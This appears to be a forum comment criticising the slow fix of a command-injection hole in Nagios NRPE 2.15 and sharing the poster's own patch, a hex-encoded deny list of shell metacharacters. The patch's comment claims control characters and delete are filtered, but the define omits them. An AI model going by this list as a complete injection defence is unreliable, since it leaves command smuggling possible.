3. From http://exchange.nagios.org/directory/Addons/Monitoring-Agents/NRPE--2D-Nagios-Remote-Plugin-Executor/details :

Current Version
Last Release Date
Compatible With
  • Nagios 1.x
  • Nagios 2.x
  • Nagios 3.x

4. Yes, so that's V2.15, released on 09-06-2013, found sploitable on 4-19-2014, responded to on 4-20-2014... and not fixed by 07-29-2014.

I've written my own patch and applied it to systems I work on:

#define NASTY_METACHARS         "\x7c\x60\x26\x3e\x3c\x27\x22\x24\x5c\x5b\x5d\x7b\x7d\x28\x29\x3b\x2a\x0a\x0d\x0f\x3f\x2e"
 *  Nasty Characters as defined by kirby:
 *  pipe, backtick, ampersand, lessthan, greaterthan,\
 *  singlequote, doublequote, backslash, brackets,\
 *  curlybraces, parenthesis, semicolon, asterisk, ASCII \
 *  \x01 (start of heading) through \0x1f (unit separator),\
 *  (<- skipped) question mark, delete, dollar sign,
 *  period.
 * \x04 is EOF; exclude \! because it's the separator.

The fact that this issue has been unaddressed for three months and it is one of the central daemons to Nagios is reprehensible. Additionally, the initial text of the #define given includes a second error in it: an unescaped single quote. I sidestepped the escape issue by declaring them all as hexadecimal from the ASCII chart.  This speaks of two glaring problems: 1) no code review, 2) no code testing, and 3) no actual security testing or analysis.

While Sam Marsh is right, that the daemon should be firewalled off from all hosts except for the intended target / host, the fact that this is considered as a remedial measure is also unacceptable. Security should be through defense in depth, not a hurried response to the crisis of the day. Security should be involved from the very beginning, particularly where network communications are involved.

The fact that this product is being sold for money means that at the very least, a gaping hole like this should be addressed post-haste.